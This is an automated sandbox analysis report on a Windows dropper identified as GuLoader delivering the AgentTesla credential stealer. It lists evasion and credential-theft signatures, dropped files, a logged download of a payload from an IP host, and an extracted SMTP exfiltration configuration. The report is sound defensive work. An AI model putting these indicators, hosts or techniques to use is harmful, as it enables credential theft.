Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ordene 501527,pdf.exe

Overview

General Information

Sample Name:Ordene 501527,pdf.exe
Analysis ID:680367
MD5:5162b6782f86f1f24e8610544d159ae9
SHA1:0d1ead84c74ee462976928783c1f733aa859bc94
SHA256:6730e52c8075c7e044c2bbaf9f7ad8c0f7f8d03fb23adbd2331adc8b591caec7
Infos:

Detection

AgentTesla, GuLoader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware

Classification

  • System is w10x64native
  • Ordene 501527,pdf.exe (PID: 4496 cmdline: "C:\Users\user\Desktop\Ordene 501527,pdf.exe" MD5: 5162B6782F86F1F24E8610544D159AE9)
    • CasPol.exe (PID: 4944 cmdline: "C:\Users\user\Desktop\Ordene 501527,pdf.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 4428 cmdline: "C:\Users\user\Desktop\Ordene 501527,pdf.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 4596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • flex.exe (PID: 7436 cmdline: "C:\Users\user\AppData\Roaming\flex\flex.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • flex.exe (PID: 5196 cmdline: "C:\Users\user\AppData\Roaming\flex\flex.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "SMTP", "SMTP Info": "ventas@merian.com.arofven1mail.merian.com.arkagawabunch869@gmail.com"}
SourceRuleDescriptionAuthorStrings
00000001.00000002.39990186767.00000000037B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000009.00000000.39838910204.0000000001300000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: CasPol.exe PID: 4428JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results
            Source: flex.exe.7436.14.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "ventas@merian.com.arofven1mail.merian.com.arkagawabunch869@gmail.com"}
            Source: Ordene 501527,pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Ordene 501527,pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\FanControlWrapper.pdb source: FanControlWrapper.dll.1.dr
            Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\FanControlWrapper.pdb source: FanControlWrapper.dll.1.dr
            Source: Binary string: caspol.pdb source: flex.exe, 0000000E.00000000.40096279867.00000000002F2000.00000002.00000001.01000000.00000008.sdmp, flex.exe.9.dr
            Source: Binary string: Microsoft.Office.Tools.Common.v9.0.pdb source: Microsoft.Office.Tools.Common.v9.0.dll.1.dr
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeCode function: 1_2_004065A2 FindFirstFileW,FindClose,
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeCode function: 1_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: Joe Sandbox ViewIP Address: 141.98.6.239 141.98.6.239
            Source: global trafficHTTP traffic detected: GET /zeaveZtePRlRbWLesj75.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 141.98.6.239Cache-Control: no-cache
            Source: global trafficTCP traffic: 192.168.11.20:49796 -> 69.61.116.42:587
            Source: global trafficTCP traffic: 192.168.11.20:49796 -> 69.61.116.42:587
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.239
            Source: CasPol.exe, 00000009.00000002.44519707198.000000001DAE8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.40142393670.0000000020F9F000.00000004.00000800.00020000.00000000.sdmp, Cookies.9.drString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
            Source: CasPol.exe, 00000009.00000003.40142393670.0000000020F9F000.00000004.00000800.00020000.00000000.sdmp, Cookies.9.drString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
            Source: CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000009.00000002.44498847642.00000000014D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.239/zeaveZtePRlRbWLesj75.dwp
            Source: CasPol.exe, 00000009.00000002.44498847642.00000000014D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.239/zeaveZtePRlRbWLesj75.dwplh
            Source: CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://FvewWS.com
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: CasPol.exe, 00000009.00000002.44498847642.00000000014D6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.merian.com.ar
            Source: CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://merian.com.ar
            Source: Ordene 501527,pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CasPol.exe, 00000009.00000002.44498847642.00000000014D6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: Ordene 501527,pdf.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
            Source: Ordene 501527,pdf.exeString found in binary or memory: http://s.symcd.com06
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
            Source: Ordene 501527,pdf.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
            Source: Ordene 501527,pdf.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
            Source: Ordene 501527,pdf.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
            Source: FanControlWrapper.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%appdata
            Source: CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%t-
            Source: Ordene 501527,pdf.exeString found in binary or memory: https://d.symcb.com/cps0%
            Source: Ordene 501527,pdf.exeString found in binary or memory: https://d.symcb.com/rpa0
            Source: Ordene 501527,pdf.exeString found in binary or memory: https://d.symcb.com/rpa0.
            Source: CasPol.exe, 00000009.00000002.44518397705.000000001DA13000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 00000009.00000002.44518397705.000000001DA13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 00000009.00000002.44518397705.000000001DA13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 00000009.00000002.44518397705.000000001DA13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: CasPol.exe, 00000009.00000002.44518958056.000000001DA75000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.40043700714.000000001C831000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519545264.000000001DAD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rwUCPncwlnlg0H1LG.net
            Source: CasPol.exe, 00000009.00000002.44518958056.000000001DA75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rwUCPncwlnlg0H1LG.nett-
            Source: CasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com
            Source: CasPol.exe, 00000009.00000002.44519232973.000000001DA9D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44529629703.0000000020F90000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44519910229.000000001DB05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: CasPol.exe, 00000009.00000002.44518397705.000000001DA13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: FanControlWrapper.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: FanControlWrapper.dll.1.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: CasPol.exe, 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknownDNS traffic detected: queries for: mail.merian.com.ar
            Source: global trafficHTTP traffic detected: GET /zeaveZtePRlRbWLesj75.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 141.98.6.239Cache-Control: no-cache
            Source: Ordene 501527,pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeCode function: 1_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01312168
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0131233B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01312366
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D7B9F18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D7B9648
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_1D7B9300
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeCode function: 14_2_026E0D60
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeCode function: 16_2_02610D60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 1D7BCF00 appears 54 times
            Source: Ordene 501527,pdf.exe, 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMicrosoft.Office.Tools.Common.v9.0.dlll% vs Ordene 501527,pdf.exe
            Source: Ordene 501527,pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeSection loaded: edgegdi.dll
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeSection loaded: edgegdi.dll
            Source: Ordene 501527,pdf.exeStatic PE information: invalid certificate
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\flex\flex.exe 7D3BDB5B7EE9685C7C18C0C3272DA2A593F6C5C326F1EA67F22AAE27C57BA1E6
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile read: C:\Users\user\Desktop\Ordene 501527,pdf.exeJump to behavior
            Source: Ordene 501527,pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\Ordene 501527,pdf.exe "C:\Users\user\Desktop\Ordene 501527,pdf.exe"
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Ordene 501527,pdf.exe"
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Ordene 501527,pdf.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\flex\flex.exe "C:\Users\user\AppData\Roaming\flex\flex.exe"
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\flex\flex.exe "C:\Users\user\AppData\Roaming\flex\flex.exe"
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeCode function: 1_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\MisundesJump to behavior
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsz2213.tmpJump to behavior
            Source: classification engineClassification label: mal92.troj.spyw.evad.winEXE@8/12@1/2
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: flex.exe.9.dr, Microsoft.Tools.Caspol/caspol.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: flex.exe.9.dr, Microsoft.Tools.Caspol/caspol.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 14.0.flex.exe.2f0000.0.unpack, Microsoft.Tools.Caspol/caspol.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 14.0.flex.exe.2f0000.0.unpack, Microsoft.Tools.Caspol/caspol.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\flex\flex.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4596:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4596:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:304:WilStaging_02
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Ordene 501527,pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\FanControlWrapper.pdb source: FanControlWrapper.dll.1.dr
            Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\FanControlWrapper.pdb source: FanControlWrapper.dll.1.dr
            Source: Binary string: caspol.pdb source: flex.exe, 0000000E.00000000.40096279867.00000000002F2000.00000002.00000001.01000000.00000008.sdmp, flex.exe.9.dr
            Source: Binary string: Microsoft.Office.Tools.Common.v9.0.pdb source: Microsoft.Office.Tools.Common.v9.0.dll.1.dr

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.39990186767.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.39838910204.0000000001300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_013122B2 pushfd ; iretd
            Source: FanControlWrapper.dll.1.drStatic PE information: section name: .nep
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsd84B6.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\Microsoft.Office.Tools.Common.v9.0.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\Roaming\flex\flex.exeJump to dropped file
            Source: C:\Users\user\Desktop\Ordene 501527,pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\FanControlWrapper.dllJump to dropped file
